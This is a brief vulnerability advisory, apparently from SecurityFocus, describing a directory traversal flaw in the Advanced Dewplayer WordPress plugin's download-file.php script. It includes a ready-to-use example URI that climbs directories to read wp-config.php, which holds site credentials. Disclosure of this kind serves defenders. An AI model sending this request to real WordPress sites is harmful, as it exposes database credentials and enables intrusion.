Advanced Dewplayer Plugin for WordPress 'download-file.php' Script Directory Traversal Vulnerability

The following example URI is available:

http://www.example.com/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php


 

Privacy Statement
Copyright 2010, SecurityFocus